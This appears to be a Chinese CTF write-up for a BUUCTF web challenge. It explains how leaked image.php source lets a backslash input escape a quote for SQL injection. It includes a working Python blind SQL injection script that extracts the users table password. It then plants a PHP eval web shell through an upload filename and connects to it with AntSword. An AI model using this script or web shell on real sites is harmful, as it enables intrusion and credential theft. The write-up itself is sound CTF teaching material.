一天一道ctf 第49天

在这里插入图片描述
查看源码点击image.php?id=1看一下,不一样的id对应了不一样的图片。
在这里插入图片描述
在这里插入图片描述
robots.txt泄露备份文件,image.php.bak查看源码

include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

addslashes会在单引号,双引号,反斜杠前面加一个/来转义。然后经过str_replace把\0,500,\','都替换成空。那如果我们输入?id=\0,经过URL第一个\用来转义传进去的id就是\0,然后addslashes又把它变回\0,经过strreplace变成\,就可以把'{$id}'的第二个单引号转义,第一个单引号跟path的第一个单引号闭合。我们可以在path变量里传任何参数执行只要把最后一个单引号闭合了就行。

import  requests

url = "http://8f6bddb9-6974-4f8a-a148-4070a9553a3e.node4.buuoj.cn:81//image.php?id=\\0&path="
payload = "or id=if(ascii(substr((select password from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
    l = 1
    r = 130
    mid = (l + r)>>1
    while(l<r):
        payloads = payload.format(i,mid)
        print(url+payloads)
        html = requests.get(url+payloads)
        if "JFIF" in html.text:
            l = mid +1
        else:
            r = mid
        mid = (l + r)>>1
    result+=chr(mid)
    print(result)

爆一遍username和password,JFIF是图像的一种存储格式。但因为id错误的话什么也不会显示,所以哪怕用’1‘也可以。
登录成功后是一个文件上传页面,你上传的文件名会被登记在如下的php文件里,那我们可以用文件名写一句话木马,然后用蚁剑连接这个php文件。在这里插入图片描述
php被过滤了,所以要把<?php @eval($_POST['hack']);?>改成<?=@eval($_POST['hack']);?>。上传成功后蚁剑连接

http://8f6bddb9-6974-4f8a-a148-4070a9553a3e.node4.buuoj.cn:81/logs/upload.c197fa5bd8827307f85d3b918516bf36.log.php

在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值